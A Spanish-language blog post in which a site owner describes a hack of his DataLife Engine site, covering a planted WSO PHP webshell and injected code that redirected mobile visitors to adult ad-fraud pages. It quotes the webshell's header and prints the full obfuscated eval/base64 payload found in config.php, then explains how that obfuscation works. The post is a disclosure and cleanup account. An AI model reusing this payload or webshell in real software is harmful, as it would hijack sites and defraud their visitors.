Recientemente este sitio fue atacado por algún desocupado el cual creo una puerta trasera (Backdoor:PHP/WebShell) en tutorialesenline.es en unos de sus directorios.

Ataques a sitios web con fraude publicitario - best-winnerspace1.life
Una vez que tuvo acceso con esta puerta trasera pudo infectar algunos de los archivos de php de mi cms de datalife engine, con un código ofuscado del php.

Los antecedentes de la infeccion


Cada vez que un usuario o una nueva dirección IP entraba a la version movil de tutorialesenlinea.es lo redirrecionaba a: 
best-winnerspace1.life/?u=utt8wwl&o=67zmqf5&t=en_mac.txt&cid=41-297-20210223015523b67eb1f15
La cual era publicidad para adultos, en pocas palabras una porquería de publicidad y así llevaba varias semanas, pensé al principio que era alguna apk que estaba inyectándola, hasta que me propuse averiguar que era, después de haber limpiado y reseteado mi móvil seguía ese redireccionamiento maligno. 

Una vez que me di cuenta que no era mi móvil si no el dominio en si, escanee todos los directorios y archivos del dominio hasta que dio positivo en un archivo que tenia una puerta trasera, después de ello había ofuscado algunos de los archivos y así hacia los redireccionamiento a esa publicidad engañosa. 


EL archivo en cuestión era wso.txt cuando hice una pequeña busqueda me di cuenta que era un #PHP webshell / Administrador de archivos Nuevo Web Shell WSO su código fuente estaba en github, a continuación les mostrare un ejemplo del código:
<?php
/* WSO 2.2.0 (Web Shell by HARD _LINUX) ESTAS LINEAS HABIA SIDO MODIFICADAS POR EL CABRON */
$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
$color = "#fff";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.2.0');...............y aun continua...
Esa herramienta esta solo para fines de prueba y solo se puede usar cuando se haya otorgado un consentimiento expreso. No lo use para fines ilegales. ESO ES LO QUE DICEN LOS CREADORES DE ESTE CODIGO. Ver código en github

Ahora nos toca la ofuscación del código php de los archivos php.

Como ofuscar Codigo PHP


La ofuscación de código es una técnica que permite ocultar el código para que no sea descifrado o sea difícil de descifrar, y así evitar que se conozcan y/o modifiquen los algoritmos las url y demás codigos.

Para lograr esto por lo general suele usar estas funciones base64_encode, base64_decode y eval.

  • base64_encode(texto) toma como parámetro una cadena de texto y la convierte en codificación base64.
  • base64_decode(texto) toma como parámetro una cadena de texto codificada en base64 y la convierte en texto normal.
  • eval(texto) toma como parámetro una cadena de texto y la ejecuta como código PHP.
En mi caso habían utilizado el segundo de los anteriores expuesto, ejemplo del código:
 $dle_lic = "@Ev"."AL(gZu"."nCOmp"."rEss(bAS"."e64"."_Dec"."odE('eF6VVW1v2zYQ/isOYIQS7Mgvkm0pntashbEFG9otTVYMrSFQ0lniLIkKScU1yvz3HqUEiQvPwD7ojuS933Ok+rGAkESk55CokYaBaDeGsJQs2cayvMCfDTzPn9g/m2VP657kyRZUlBRcgtUXG9teQiHhWynlfRHdNyD25njYF/BMMJK9fER/TEpQVj969+HD79erz0awtu1vV3iacL5l6BCPhocKg8lQsRIse+DPgtliSEak82ZdHSqGIQmm3mLs+hNic/Gf4oV/WhycFPtjciRlMveC6djzZ3M3mHlI/MAdz3xv7vlu4JEjFZjWhBjk4+rm79XNZ6mEgAcLmeJNXYOwCBNNpCQ09wiMba+X/UawVxbkZvXX3erjbXR3c03Wy6t+zmV4yp+SPI9qpfLWWwsvZjnwXM9HeHFp4KVC0H2EpiBafFsQOwyHJsIz3KykGSQCqIKN4GWG7jrUNwgO0tOlCUDHIF6yyYGmKHhSJe4bliVOXSozjCPJcjUyq20CedIeJYljeCa4YRfurj0dXdathcp7lxVn7ZK2BvwPYiM7l8DbKcfeIxN014gCqoSn3SwblZoKWoICEX7pb2G/4yJFM9xIOG9EOEG7IxWFr0s6x5p+8E5yperLkSnDtBEpqptmfmVquctZAZbrB/6FITY6fqCFZQAfPhGZmb4iO91YVUFGET7ZHCDtBq73U6kiQavUmkz8+XC68FzbrgVkqF0XNMEGGHiX/x87y5tPFheGDNzFYnFhiP0GTaqkrNvrYV8+x8YrNBkaVbsdwLOXaf7t9vbP6A530S+/rt7fkrW5hCfEeCHbe3rW1lBSleQWGcWUpY1OsO8a21+A/uS+i/SqUPS60p8yUBqzgK+a0YiKJNc051yzrKT6LVe6ZjiEmpYxGv5D3wq+05xnuIlRWFJWOCNGOjDwDcACDmK3np1OT2i+dUSjH7ZOwjsnjk6bZGs+LXnGGy1zqDBwRR9MUF44SRda6B1TOH+aVVLRDLOqzK4rrVFNDEideN/lzdOKb3VT8ExvEMWYO1pCW9veFIf5yAo9y5JNtYgTR8esyro6zONtqjgso3ZiLFxiRLkvYy51lQrOUl2ytNYgGMgvvflY5yqJNI9xcPW/0xI06jJaoVbFdJ3zCl5aZYA/++HtJ2kB+N/BOcJ/zfq4ztP/oRUdpBjSNK1gJzXeuoxJ051wA5DGFJsbFqa7SiNjlVPntaZp+XqFBoIqxqsuQ8G6EGbVOwt75nU+8sA//RwWx97yx8fH701Gaes=')));";$lic_true = "cre"."ate_"."function";@$dle_conf = $lic_true('', "$dle_lic;");$dle_conf('');                                     
El anterior código estaba escrito en la parte superior del archivo de engine/data/config.php.
Ataques a sitios web con fraude publicitario - best-winnerspace1.lifeEn la anterior imagen se muestra algunos de los archivos modificados por estos desocupados. Despues de limpiar el codigo ofuscado y de eliminar la puerta trasera el sitio web se muestra con normalidad y sin publicidad para adultos. Acontinuacion les dejare una captura de pantalla de esa mierda de publicidad (A saber que esta era la que mas salia pero son muchas en si ).
Ataques a sitios web con fraude publicitario - best-winnerspace1.life Y en conclusión hay que tener mas cuidado con las actualizaciones de seguridad de los cms(sistema de gestión de contenido), módulos,  complementos y demás.

Te sugiero seguir leyendo...

  • Autor:
  • Categorias: Tutorial Noticias Estafa Seguridad

Ataques a sitios web con fraude publicitario - best-winnerspace1.life Ataques a sitios web con fraude publicitario - best-winnerspace1.life...
Tutoriales en linea
¿Te gusta el tutorial?





Información
Usuarios que no esten registrados no pueden dejar comentarios, te invitamos a que te registre!